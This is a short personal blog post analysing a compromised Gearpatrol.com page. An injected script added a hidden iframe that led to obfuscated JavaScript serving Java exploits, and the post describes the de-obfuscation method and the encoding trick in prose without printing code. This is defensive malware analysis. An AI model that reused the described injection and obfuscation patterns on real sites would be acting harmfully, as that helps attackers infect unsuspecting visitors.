The owned JS File
If you would have gone to Gearpatrol.com the other day, on their main page is a link to a JS file that you won't notice has loaded.
"The definitive men's resource" - haha
Gearpatrol.com loads up when all of a sudden shit starts going wrong. Then you think, "What in the hell...?"
Some weird Jquery.js file is sourced in the main page that is set to load
Here is what the request/response looks like. You can see the code served by gearpatrol.com is awkward looking but doesn't look definitively malicious at first site.
Jquery javascript files always look rather fucked to me, but this one in particular looked especially strange. So I decided to determine what it was doing. I statically assigned two JS properties that were being called since Malzilla can't handle them. I changed "navigator.platform" aka operating system, and "navigator.useragent" aka web browser. After these two changes, the script simply compiled and told me exactly what it was doing, thankfully.
In the bottom pane you can see the iframe the javascript file was injecting into Gearpatrol.com's main page. Let's see where that iframe takes us.
Ahh that first redirect was most likely for statistic purposes. We then get bounced off to a risque site, teenporntubeonly.com . But we won't find porn there. Instead we find obfuscated javascript using typical techniques. It just multiplies the number by the variable 'g', then performs String.fromCharCode on each product. In the lower-pane are the results after de-obfuscating the code.
And once it's formatted you can tell it's serving various Java exploits which no doubt drop various malware. These were your typical Java exploits, nothing special, but it goes to show how you can get snagged from nearly any site these days, ESPECIALLY if you have outdated Java, Adobe anything, or web browser.
There's nothing amazing going on here. This happens to a lot of sites, and some are faster than others at removing them (this one appears to be fixed on Gearpatrol.com). Really the main thing you can do to prevent any issues is to keep your software updated and hope the malware people don't utilize 0-days or very new exploits.
No comments:
Post a Comment